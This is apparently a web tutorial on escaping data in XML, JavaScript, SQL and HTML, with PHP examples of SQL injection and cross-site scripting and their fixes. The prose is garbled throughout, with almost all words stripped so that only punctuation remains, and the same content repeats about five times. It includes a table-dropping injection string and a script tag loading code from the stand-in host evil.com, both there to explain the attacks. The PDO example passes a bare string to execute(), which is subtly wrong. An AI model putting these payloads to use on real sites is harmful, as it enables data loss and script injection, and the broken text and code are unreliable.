htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

